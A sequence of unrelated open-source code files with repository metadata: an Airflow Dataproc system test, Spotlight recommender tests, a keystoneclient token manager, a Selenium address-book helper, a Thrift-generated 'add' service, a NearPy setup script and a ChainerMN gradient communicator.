BUCKET = os.environ.get("GCP_DATAPROC_BUCKET", "dataproc-system-tests")
# Filename of the PySpark job that gets uploaded to the bucket.
PYSPARK_MAIN = os.environ.get("PYSPARK_MAIN", "hello_world.py")
# Fully-qualified gs:// URI of the uploaded job, passed to the example DAG.
PYSPARK_URI = "gs://{}/{}".format(BUCKET, PYSPARK_MAIN)
@skip_gcp_system(GCP_DATAPROC_KEY, require_local_executor=True)
class DataprocExampleDagsTest(SystemTest):
    """System test that runs the example_gcp_dataproc DAG end-to-end.

    Skipped unless the Dataproc GCP key is available; each phase runs under
    provide_gcp_context so the service-account credentials are active.
    """

    helper = DataprocTestHelper()

    @provide_gcp_context(GCP_DATAPROC_KEY)
    def setUp(self):
        # Stage the PySpark job in a fresh test bucket before the DAG runs.
        super().setUp()
        self.helper.create_test_bucket(BUCKET)
        self.helper.upload_test_file(PYSPARK_URI, PYSPARK_MAIN)

    @provide_gcp_context(GCP_DATAPROC_KEY)
    def tearDown(self):
        # Remove staged objects so repeated runs start clean.
        self.helper.delete_gcs_bucket_elements(BUCKET)
        super().tearDown()

    @provide_gcp_context(GCP_DATAPROC_KEY)
    def test_run_example_dag(self):
        self.run_dag(dag_id="example_gcp_dataproc", dag_folder=CLOUD_DAG_FOLDER)
| {
"content_hash": "712f66779e61a305519f6a2d983f8ba8",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 106,
"avg_line_length": 40.3,
"alnum_prop": 0.738626964433416,
"repo_name": "wileeam/airflow",
"id": "7c69c6b8e25c1258e74f28ae93a24a39dfe4042a",
"size": "1996",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/providers/google/cloud/operators/test_dataproc_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17179"
},
{
"name": "HTML",
"bytes": "148281"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "9763694"
},
{
"name": "Shell",
"bytes": "221331"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
import os
import numpy as np
import pytest
from spotlight.cross_validation import user_based_train_test_split
from spotlight.datasets import synthetic
from spotlight.evaluation import sequence_mrr_score
from spotlight.layers import BloomEmbedding
from spotlight.sequence.implicit import ImplicitSequenceModel
from spotlight.sequence.representations import CNNNet, LSTMNet, PoolNet
RANDOM_SEED = 42
NUM_EPOCHS = 5
EMBEDDING_DIM = 32
BATCH_SIZE = 128
LOSS = 'bpr'
VERBOSE = True
CUDA = bool(os.environ.get('SPOTLIGHT_CUDA', False))
def _get_synthetic_data(num_users=100,
                        num_items=100,
                        num_interactions=10000,
                        randomness=0.01,
                        order=2,
                        max_sequence_length=10,
                        random_state=None):
    """Generate a synthetic sequential dataset and return (train, test) sequences.

    The concentration parameter controls how predictable the item sequences
    are; the split is user-based, and both halves are converted to padded
    sequences of at most *max_sequence_length* items.
    """
    dataset = synthetic.generate_sequential(
        num_users=num_users,
        num_items=num_items,
        num_interactions=num_interactions,
        concentration_parameter=randomness,
        order=order,
        random_state=random_state)

    # Report how peaked the item distribution is (sanity check on randomness).
    _, item_counts = np.unique(dataset.item_ids, return_counts=True)
    print('Max prob {}'.format((item_counts / num_interactions).max()))

    train, test = user_based_train_test_split(dataset, random_state=random_state)

    return (train.to_sequence(max_sequence_length=max_sequence_length, step_size=None),
            test.to_sequence(max_sequence_length=max_sequence_length, step_size=None))
def _evaluate(model, test):
    """Score *model* on *test* sequences, print the mean MRR, return the scores."""
    scores = sequence_mrr_score(model, test)
    print('Test MRR {}'.format(scores.mean()))
    return scores
@pytest.mark.parametrize('randomness, expected_mrr', [
    (1e-3, 0.18),
    (1e2, 0.03),
])
def test_implicit_pooling_synthetic(randomness, expected_mrr):
    """Pooling representation must clear the MRR floor: well above chance on
    near-deterministic data (1e-3) and around chance on random data (1e2)."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=randomness,
                                      random_state=random_state)

    # Hyperparameters below are tuned for this synthetic setup; change with care.
    model = ImplicitSequenceModel(loss=LOSS,
                                  batch_size=BATCH_SIZE,
                                  embedding_dim=EMBEDDING_DIM,
                                  learning_rate=1e-1,
                                  l2=1e-9,
                                  n_iter=NUM_EPOCHS,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
    (1e-3, 0.61),
    (1e2, 0.03),
])
def test_implicit_lstm_synthetic(randomness, expected_mrr):
    """LSTM representation: higher MRR floor than pooling on predictable data,
    chance-level on random data. Trains 5x longer than the pooling test."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=randomness,
                                      random_state=random_state)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation='lstm',
                                  batch_size=BATCH_SIZE,
                                  embedding_dim=EMBEDDING_DIM,
                                  learning_rate=1e-2,
                                  l2=1e-7,
                                  n_iter=NUM_EPOCHS * 5,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
    (1e-3, 0.65),
    (1e2, 0.03),
])
def test_implicit_cnn_synthetic(randomness, expected_mrr):
    """Single-layer CNN representation (kernel width 5) passed as an explicit
    CNNNet instance rather than by name."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=randomness,
                                      random_state=random_state)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation=CNNNet(train.num_items,
                                                        embedding_dim=EMBEDDING_DIM,
                                                        kernel_width=5,
                                                        num_layers=1),
                                  batch_size=BATCH_SIZE,
                                  learning_rate=1e-2,
                                  l2=0.0,
                                  n_iter=NUM_EPOCHS * 5,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('num_layers, dilation, expected_mrr', [
    (1, (1,), 0.65),
    (2, (1, 2), 0.65),
])
def test_implicit_cnn_dilation_synthetic(num_layers, dilation, expected_mrr):
    """Dilated CNN variants: one dilation value per layer; training epochs are
    scaled with the layer count."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=1e-03,
                                      num_interactions=20000,
                                      random_state=random_state)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation=CNNNet(train.num_items,
                                                        embedding_dim=EMBEDDING_DIM,
                                                        kernel_width=3,
                                                        dilation=dilation,
                                                        num_layers=num_layers),
                                  batch_size=BATCH_SIZE,
                                  learning_rate=1e-2,
                                  l2=0.0,
                                  n_iter=NUM_EPOCHS * 5 * num_layers,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
    (1e-3, 0.3),
    (1e2, 0.03),
])
def test_implicit_lstm_mixture_synthetic(randomness, expected_mrr):
    """Mixture-of-tastes LSTM representation; needs the longest training run
    (10x base epochs) but is held to a lower MRR floor than the plain LSTM."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=randomness,
                                      random_state=random_state)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation='mixture',
                                  batch_size=BATCH_SIZE,
                                  embedding_dim=EMBEDDING_DIM,
                                  learning_rate=1e-2,
                                  l2=1e-7,
                                  n_iter=NUM_EPOCHS * 10,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('loss, expected_mrr', [
    ('pointwise', 0.15),
    ('hinge', 0.16),
    ('bpr', 0.18),
    ('adaptive_hinge', 0.16),
])
def test_implicit_pooling_losses(loss, expected_mrr):
    """Every supported loss must train the pooling model past a per-loss MRR
    floor on near-deterministic data."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=1e-3,
                                      random_state=random_state)

    model = ImplicitSequenceModel(loss=loss,
                                  batch_size=BATCH_SIZE,
                                  embedding_dim=EMBEDDING_DIM,
                                  learning_rate=1e-1,
                                  l2=1e-9,
                                  n_iter=NUM_EPOCHS,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
    (0.2, 0.14),
    (0.5, 0.30),
    (1.0, 0.5),
])
def test_bloom_cnn(compression_ratio, expected_mrr):
    """CNN with hashed (Bloom) item embeddings: stronger compression is allowed
    a lower MRR floor."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=1e-03,
                                      num_interactions=20000,
                                      random_state=random_state)

    embedding = BloomEmbedding(train.num_items,
                               32,
                               compression_ratio=compression_ratio,
                               num_hash_functions=2)
    representation = CNNNet(train.num_items,
                            embedding_dim=EMBEDDING_DIM,
                            kernel_width=3,
                            item_embedding_layer=embedding)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation=representation,
                                  batch_size=BATCH_SIZE,
                                  learning_rate=1e-2,
                                  l2=0.0,
                                  n_iter=NUM_EPOCHS,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
    (0.2, 0.18),
    (0.5, 0.40),
    (1.0, 0.60),
])
def test_bloom_lstm(compression_ratio, expected_mrr):
    """LSTM with Bloom item embeddings (4 hash functions); per-ratio MRR floors."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=1e-03,
                                      num_interactions=20000,
                                      random_state=random_state)

    embedding = BloomEmbedding(train.num_items,
                               32,
                               compression_ratio=compression_ratio,
                               num_hash_functions=4)
    representation = LSTMNet(train.num_items,
                             embedding_dim=EMBEDDING_DIM,
                             item_embedding_layer=embedding)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation=representation,
                                  batch_size=BATCH_SIZE,
                                  learning_rate=1e-2,
                                  l2=1e-7,
                                  n_iter=NUM_EPOCHS * 5,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
    (0.2, 0.06),
    (0.5, 0.07),
    (1.0, 0.13),
])
def test_bloom_pooling(compression_ratio, expected_mrr):
    """Pooling with Bloom item embeddings; the weakest representation, so the
    MRR floors are correspondingly low."""
    random_state = np.random.RandomState(RANDOM_SEED)
    train, test = _get_synthetic_data(randomness=1e-03,
                                      num_interactions=20000,
                                      random_state=random_state)

    embedding = BloomEmbedding(train.num_items,
                               32,
                               compression_ratio=compression_ratio,
                               num_hash_functions=2)
    representation = PoolNet(train.num_items,
                             embedding_dim=EMBEDDING_DIM,
                             item_embedding_layer=embedding)

    model = ImplicitSequenceModel(loss=LOSS,
                                  representation=representation,
                                  batch_size=BATCH_SIZE,
                                  learning_rate=1e-2,
                                  l2=1e-7,
                                  n_iter=NUM_EPOCHS * 5,
                                  random_state=random_state,
                                  use_cuda=CUDA)

    model.fit(train, verbose=VERBOSE)

    mrr = _evaluate(model, test)

    assert mrr.mean() > expected_mrr
| {
"content_hash": "2152577b4b74c3968bc96ec70ac854ed",
"timestamp": "",
"source": "github",
"line_count": 340,
"max_line_length": 84,
"avg_line_length": 35.63235294117647,
"alnum_prop": 0.4741229880313661,
"repo_name": "maciejkula/spotlight",
"id": "a3f89eb66d113b6c73147ee4e4684abac7fca88d",
"size": "12115",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/sequence/test_sequence_implicit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "147302"
},
{
"name": "Shell",
"bytes": "3427"
}
],
"symlink_target": ""
} |
from keystoneclient import base
from keystoneclient import utils
class Token(base.Resource):
    """A token resource as returned by the Identity v2.0 API.

    Wraps the raw response dict (``self._info``) and exposes the nested
    ``token`` fields as read-only properties.
    """

    def __repr__(self):
        return "<Token %s>" % (self._info,)

    @property
    def id(self):
        """The token's identifier string."""
        token = self._info['token']
        return token['id']

    @property
    def expires(self):
        """The token's expiry timestamp."""
        token = self._info['token']
        return token['expires']

    @property
    def tenant(self):
        """The tenant scoped by the token, or None for unscoped tokens."""
        token = self._info['token']
        return token.get('tenant')
class TokenManager(base.Manager):
    """Manager for Identity v2.0 token operations (create, delete, endpoints)."""

    resource_class = Token

    @utils.positional(enforcement=utils.positional.WARN)
    def authenticate(self, username=None, tenant_id=None, tenant_name=None,
                     password=None, token=None, return_raw=False):
        """Authenticate and return a new token.

        Either an existing *token* or a *username*/*password* pair must be
        supplied; the request may optionally be scoped to a tenant by id or
        name. Raises ValueError when neither credential form is given.
        """
        if token:
            params = {"auth": {"token": {"id": token}}}
        elif username and password:
            params = {"auth": {"passwordCredentials": {"username": username,
                                                       "password": password}}}
        else:
            raise ValueError('A username and password or token is required.')
        if tenant_id:
            params['auth']['tenantId'] = tenant_id
        elif tenant_name:
            params['auth']['tenantName'] = tenant_name
        # Before the first authentication there is no management endpoint yet,
        # so temporarily aim the client at the auth endpoint.
        reset = self.api.management_url is None
        if reset:
            self.api.management_url = self.api.auth_url
        try:
            token_ref = self._create('/tokens', params, "access",
                                     return_raw=return_raw)
        finally:
            # Restore the original state even when the request fails;
            # previously a failed request left management_url pointing at
            # auth_url permanently.
            if reset:
                self.api.management_url = None
        return token_ref

    def delete(self, token):
        """Revoke a token (accepts a Token object or an id)."""
        return self._delete("/tokens/%s" % base.getid(token))

    def endpoints(self, token):
        """List the service endpoints available to *token*."""
        return self._get("/tokens/%s/endpoints" % base.getid(token), "token")
| {
"content_hash": "69e9349f3f9518a246ca67292840af09",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 78,
"avg_line_length": 32.58490566037736,
"alnum_prop": 0.5639837869137232,
"repo_name": "jamielennox/python-keystoneclient",
"id": "53ea1da97333c44e90a79c42f1383a29edf00c00",
"size": "2300",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "keystoneclient/v2_0/tokens.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16002"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "1130767"
},
{
"name": "Shell",
"bytes": "12048"
}
],
"symlink_target": ""
} |
from fixture.TestBase import BaseClass
from selenium.webdriver.firefox.webdriver import WebDriver
class Contract:
    """Plain value object carrying every field of an address-book entry.

    All fields default to None; unset fields are simply skipped by the form
    helpers that consume this object.
    """

    def __init__(self, first_name=None, middle_name=None, last_name=None, nickname=None, title=None, company_name=None,
                 address_name=None, home=None, mobile=None, work=None, fax=None, email1=None, email2=None, email3=None,
                 homepage=None, address=None, phone=None, notes=None):
        # Every keyword argument becomes an attribute of the same name.
        fields = dict(locals())
        del fields['self']
        self.__dict__.update(fields)
class ContractBase():
    """Page-object helper driving the address-book "add contact" form.

    Owns a Firefox WebDriver instance; each add_* method fills one section of
    the form from a Contract value object. Method signatures are unchanged
    from the original; the repetitive click/clear/send_keys triplets are
    factored into the private _fill helper.
    """

    def __init__(self):
        self.wd = WebDriver()
        self.wd.implicitly_wait(60)
        self.session = BaseClass(self)

    def _fill(self, field_name, value):
        # Locate a form field by its name attribute, then click, clear and type.
        element = self.wd.find_element_by_name(field_name)
        element.click()
        element.clear()
        element.send_keys("%s" % value)

    def add_contract(self):
        """Open the "add new" form."""
        wd = self.wd
        wd.find_element_by_link_text("add new").click()
        # NOTE(review): send_keys() with no argument types nothing — kept for
        # behavioral compatibility, but this looks like leftover recorder output.
        wd.find_element_by_name("email").click()
        wd.find_element_by_name("email").clear()
        wd.find_element_by_name("email").send_keys()

    def add_full_name(self, Contract):
        """Fill first/middle/last/nickname; unset (falsy) fields are skipped."""
        if Contract.first_name:
            self._fill("firstname", Contract.first_name)
        if Contract.middle_name:
            self._fill("middlename", Contract.middle_name)
        if Contract.last_name:
            self._fill("lastname", Contract.last_name)
        if Contract.nickname:
            self._fill("nickname", Contract.nickname)

    def add_title(self, Contract):
        self._fill("title", Contract.title)

    def add_company(self, Contract):
        self._fill("company", Contract.company_name)

    def add_address(self, Contract):
        self._fill("address", Contract.address_name)

    def add_phone_number(self, Contract):
        """Fill home/mobile/work/fax; unset (falsy) fields are skipped."""
        if Contract.home:
            self._fill("home", Contract.home)
        if Contract.mobile:
            self._fill("mobile", Contract.mobile)
        if Contract.work:
            self._fill("work", Contract.work)
        if Contract.fax:
            self._fill("fax", Contract.fax)

    def add_email(self, Contract):
        """Fill up to three email fields; unset (falsy) fields are skipped."""
        if Contract.email1:
            # Fix: the original clicked the primary email field twice.
            self._fill("email", Contract.email1)
        if Contract.email2:
            self._fill("email2", Contract.email2)
        if Contract.email3:
            self._fill("email3", Contract.email3)

    def add_homepage(self, homepage=None):
        # Signature intentionally takes the bare value (not a Contract),
        # matching the original interface.
        self._fill("homepage", homepage)

    def add_year(self):
        """Select hard-coded birthday/anniversary dates (both years 1999)."""
        wd = self.wd
        # in futures we can made function where we will sent date and it choose it with similar way as previous
        if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
            wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
        if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
            wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
        self._fill("byear", "1999")
        if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
            wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
        if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
            wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
        self._fill("ayear", "1999")

    def add_secondary_adress(self, Contract):
        self._fill("address2", Contract.address)

    def add_secondary_home(self, Contract):
        self._fill("phone2", Contract.phone)

    def add_secondary_notes(self, Contract):
        self._fill("notes", Contract.notes)

    def submit_contact(self):
        """Submit the completed form."""
        self.wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
"content_hash": "ed4b49b55a34f923305b41ddc58db23c",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 119,
"avg_line_length": 44.79874213836478,
"alnum_prop": 0.59581636950723,
"repo_name": "werbk/task-2.3",
"id": "58706f53a76b42357b578e35ab873941de1f6489",
"size": "7123",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests_contract/contract_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13014"
}
],
"symlink_target": ""
} |
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
# NOTE: Thrift-generated service stub — regenerate from the IDL instead of
# editing by hand.
class Iface(object):
    def add(self, a, b):
        """Service interface: add two i32 values and return the i32 sum.

        Parameters:
         - a
         - b
        """
        pass
# NOTE: Thrift-generated client — regenerate from the IDL instead of editing.
class Client(Iface):
    def __init__(self, iprot, oprot=None):
        # With a single protocol the same object is used for both directions.
        self._iprot = self._oprot = iprot
        if oprot is not None:
            self._oprot = oprot
        self._seqid = 0

    def add(self, a, b):
        """Synchronous RPC: send the add request, then block on the reply.

        Parameters:
         - a
         - b
        """
        self.send_add(a, b)
        return self.recv_add()

    def send_add(self, a, b):
        # Serialize the call frame: message header + argument struct.
        self._oprot.writeMessageBegin('add', TMessageType.CALL, self._seqid)
        args = add_args()
        args.a = a
        args.b = b
        args.write(self._oprot)
        self._oprot.writeMessageEnd()
        self._oprot.trans.flush()

    def recv_add(self):
        # Read the reply frame; server-side exceptions are re-raised locally.
        iprot = self._iprot
        (fname, mtype, rseqid) = iprot.readMessageBegin()
        if mtype == TMessageType.EXCEPTION:
            x = TApplicationException()
            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = add_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        # A reply frame without a success field means the server misbehaved.
        raise TApplicationException(TApplicationException.MISSING_RESULT, "add failed: unknown result")
# NOTE: Thrift-generated server processor — regenerate from the IDL instead
# of editing.
class Processor(Iface, TProcessor):
    def __init__(self, handler):
        # handler implements Iface; _processMap dispatches by method name.
        self._handler = handler
        self._processMap = {}
        self._processMap["add"] = Processor.process_add

    def process(self, iprot, oprot):
        """Read one incoming message and dispatch it to the matching handler."""
        (name, type, seqid) = iprot.readMessageBegin()
        if name not in self._processMap:
            # Unknown method: drain the args struct and reply with an exception.
            iprot.skip(TType.STRUCT)
            iprot.readMessageEnd()
            x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
            oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
            x.write(oprot)
            oprot.writeMessageEnd()
            oprot.trans.flush()
            return
        else:
            self._processMap[name](self, seqid, iprot, oprot)
        return True

    def process_add(self, seqid, iprot, oprot):
        """Decode add() args, invoke the handler, and encode the reply."""
        args = add_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = add_result()
        try:
            result.success = self._handler.add(args.a, args.b)
            msg_type = TMessageType.REPLY
        except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
            # Transport failures and shutdown signals propagate to the server loop.
            raise
        except Exception as ex:
            # Any other handler error is reported to the client as INTERNAL_ERROR.
            msg_type = TMessageType.EXCEPTION
            logging.exception(ex)
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("add", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
# NOTE: Thrift-generated argument struct — regenerate from the IDL instead
# of editing.
class add_args(object):
    """Wire struct carrying the two i32 arguments of the add() call.

    Attributes:
     - a
     - b
    """

    # (field id, wire type, name, nested spec, default) per field; index 0 unused.
    thrift_spec = (
        None,  # 0
        (1, TType.I32, 'a', None, None, ),  # 1
        (2, TType.I32, 'b', None, None, ),  # 2
    )

    def __init__(self, a=None, b=None,):
        self.a = a
        self.b = b

    def read(self, iprot):
        # Fast path: C-accelerated decoder when the protocol provides one.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: generic field-by-field decoding; unknown fields are skipped
        # so old readers tolerate new fields.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I32:
                    self.a = iprot.readI32()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I32:
                    self.b = iprot.readI32()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        # Fast path: C-accelerated encoder when available.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        # Unset (None) fields are simply omitted from the wire.
        oprot.writeStructBegin('add_args')
        if self.a is not None:
            oprot.writeFieldBegin('a', TType.I32, 1)
            oprot.writeI32(self.a)
            oprot.writeFieldEnd()
        if self.b is not None:
            oprot.writeFieldBegin('b', TType.I32, 2)
            oprot.writeI32(self.b)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class add_result(object):
    """Result struct for the 'add' call.

    Attributes:
     - success
    """
    thrift_spec = (
        (0, TType.I32, 'success', None, None, ),  # 0
    )

    def __init__(self, success=None,):
        self.success = success

    def read(self, iprot):
        # Fast path: hand the whole struct to the accelerated C decoder.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0 and ftype == TType.I32:
                self.success = iprot.readI32()
            else:
                # Unknown or mistyped field: consume and discard it.
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        # Fast path: hand the whole struct to the accelerated C encoder.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('add_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.I32, 0)
            oprot.writeI32(self.success)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        fields = ('%s=%r' % kv for kv in self.__dict__.items())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(fields))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
| {
"content_hash": "f270f20b828a91429b1c82d9e860a375",
"timestamp": "",
"source": "github",
"line_count": 232,
"max_line_length": 134,
"avg_line_length": 30.935344827586206,
"alnum_prop": 0.5466072175003484,
"repo_name": "snower/TorThrift",
"id": "0833e3ea66670ecae87397d6e7f004c7e8acae3f",
"size": "7319",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/gen-py/example/Example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31913"
}
],
"symlink_target": ""
} |
"""Packaging script for NearPy."""
import sys

from setuptools import setup

# Pull in pytest-runner only when a test-related command was requested,
# so plain installs do not need it.
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
setup_requires = ['pytest-runner>=2.0,<3.0'] if needs_pytest else []

# Read the long description via a context manager so the file handle is
# closed deterministically (the previous open(...).read() leaked it).
with open('README.txt') as readme:
    long_description = readme.read()

setup(
    name='NearPy',
    version='0.2.2',
    author='Ole Krause-Sparmann',
    author_email='ole@pixelogik.de',
    packages=[
        'nearpy',
        'nearpy.distances',
        'nearpy.experiments',
        'nearpy.filters',
        'nearpy.hashes',
        'nearpy.hashes.permutation',
        'nearpy.storage',
        'nearpy.utils'
    ],
    url='http://pypi.python.org/pypi/NearPy/',
    license='LICENSE.txt',
    description='Framework for fast approximated nearest neighbour search.',
    long_description=long_description,
    install_requires=[
        "numpy",
        "scipy",
        "bitarray",
        "future",
    ],
    setup_requires=setup_requires,
    tests_require=[
        "pytest",
        "redis",
        "mockredispy",
    ]
)
| {
"content_hash": "ffa348dff659f7b99401ad2596f4cc5b",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 76,
"avg_line_length": 25,
"alnum_prop": 0.5821052631578948,
"repo_name": "akabos/NearPy",
"id": "9cdb26b4ba1f6d91f8d934ea030eff9d11b7dd96",
"size": "972",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "181780"
}
],
"symlink_target": ""
} |
import numpy as np
from chainermn.communicators import _memory_utility
from chainermn.communicators import mpi_communicator_base
class FlatCommunicator(mpi_communicator_base.MpiCommunicatorBase):
    """Communicator that all-reduces gradients through one flat buffer.

    All gradients of a model are packed into a single contiguous device
    buffer, averaged across workers with one collective, and unpacked back
    into the parameters.
    """

    def __init__(self, mpi_comm):
        super(FlatCommunicator, self).__init__(mpi_comm)
        # Send/receive staging buffers, reused across iterations.
        self.gpu_buffer_a = _memory_utility.DeviceMemory()
        self.gpu_buffer_b = _memory_utility.DeviceMemory()

    def multi_node_mean_grad(self, model, zero_fill=False):
        """Average the gradients of ``model`` across all workers in place.

        Args:
            model: Link whose parameter gradients are averaged.
            zero_fill: If True, parameters with no gradient are treated as
                zero-filled arrays when counting and packing.
        """
        params = _memory_utility.extract_params_set_grad(model, zero_fill)
        # Gradients are exchanged as float32; derive the element size from
        # the dtype instead of hard-coding 4 so the two stay consistent.
        allreduce_grad_dtype = np.float32
        itemsize = np.dtype(allreduce_grad_dtype).itemsize
        n_elems_total = _memory_utility.count_grad_elements(params,
                                                            zero_fill)
        n_bytes_total = n_elems_total * itemsize
        self.gpu_buffer_a.assign(n_bytes_total)
        self.gpu_buffer_b.assign(n_bytes_total)
        self._pack_params_to_buffer(params, 'grad', buffer=self.gpu_buffer_a,
                                    allreduce_grad_dtype=allreduce_grad_dtype,
                                    zero_fill=zero_fill)
        self._multi_node_mean(self.gpu_buffer_a.array(n_elems_total),
                              self.gpu_buffer_b.array(n_elems_total))
        self._unpack_params_from_buffer(params, 'grad', self.gpu_buffer_b,
                                        allreduce_grad_dtype, zero_fill)
| {
"content_hash": "29d90cf40062f237ef579e2deee82580",
